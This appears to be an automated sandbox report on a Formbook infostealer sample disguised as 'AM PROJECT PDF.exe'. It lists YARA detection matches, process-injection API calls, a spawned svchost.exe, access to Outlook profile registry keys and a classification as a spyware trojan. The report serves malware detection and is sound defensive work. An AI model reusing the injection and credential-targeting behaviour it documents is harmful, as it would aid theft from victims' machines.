Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.425240569.0000000001050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: AM PROJECT PDF.exe PID: 2104, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: AM PROJECT PDF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.425240569.0000000001050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: AM PROJECT PDF.exe PID: 2104, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 0_2_06C62F48
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 0_2_0242E9E8
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 0_2_0242BF84
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 0_2_06DA783C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116F900
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0123E824
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221002
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A830
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117B090
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012320A8
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012328EC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01232B28
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118AB40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119EBB0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122DBD2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012203DA
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0121FA2B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012322AE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01232D07
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01160D20
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01231D55
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117D5E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012325DD
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117841F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122D466
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01231FF1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0123DFCE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01186E30
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122D616
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01232EF7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004012A3
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_00422844
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004044C7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0040B4F7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0040FED7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004046E7

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Code function: String function: 0116B150 appears 66 times

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011AB040 NtSuspendThread,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011AA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9A10 NtQuerySection,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011AAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9560 NtWriteFile,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011AA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011AA770 NtOpenThread,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9760 NtOpenProcess,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A96D0 NtCreateKey,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041E027 NtClose,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041E0D7 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004012A3 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041DEF7 NtCreateFile,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041DFA7 NtReadFile,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041E021 NtClose,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004014E9 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041DEF1 NtCreateFile,
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041DF49 NtCreateFile,

Source: AM PROJECT PDF.exe	Binary or memory string: OriginalFilename vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.299387212.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.305486469.0000000003451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMetal.dllJ vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.315751087.0000000006D50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.303350926.0000000002648000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.316811478.00000000070E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMetal.dllJ vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.300887127.0000000002451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.302322896.000000000255B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.302322896.000000000255B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.303201456.0000000002631000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000000.249674589.00000000001A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamexvVr.exe4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.315432245.0000000006C50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000002.428411713.000000000125F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000003.299833951.00000000010BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000003.295891725.0000000000F28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe	Binary or memory string: OriginalFilenamexvVr.exe4 vs AM PROJECT PDF.exe

Source: AM PROJECT PDF.exe	ReversingLabs: Detection: 76%
Source: AM PROJECT PDF.exe	Metadefender: Detection: 44%

Source: AM PROJECT PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe "C:\Users\user\Desktop\AM PROJECT PDF.exe"
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AM PROJECT PDF.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Local\Temp\262I-Au

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/2@2/2

Source: AM PROJECT PDF.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: AM PROJECT PDF.exe	String found in binary or memory: Database-helpToolStripMenuItem1
Source: AM PROJECT PDF.exe	String found in binary or memory: Options-helpToolStripMenuItem2Help7userManualToolStripMenuItem
Source: AM PROJECT PDF.exe	String found in binary or memory: tab_addresses'addresses_container#addresses_quick_1/addresses_quick_title_1
Source: AM PROJECT PDF.exe	String found in binary or memory: %options_showsplash%Show Splash Screen%options_loadontabs/Load only on tab switch+options_loadhwonstart;Load hardware data on startup'options_loadonstart1Load all data on startup+options_weights_group!options_filterby%options_filter_lbl

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: AM PROJECT PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: AM PROJECT PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AM PROJECT PDF.exe, AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: AM PROJECT PDF.exe, MainWindow.cs	.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.AM PROJECT PDF.exe.b0000.0.unpack, MainWindow.cs	.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 0_2_02429888 push esp; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011BD0D1 push ecx; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041B152 push edi; iretd
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041A124 push es; iretd
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_00421279 push eax; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0041A202 push es; iretd
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0042122C push eax; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004212E3 push eax; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_00421282 push eax; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_00422B3B push 0A05B974h; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0040B404 push ecx; retf
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004224C5 push edi; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004054CD pushad ; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0040556E push ebp; retf
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_004225D5 push ebx; ret
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_00421E04 push ds; iretd
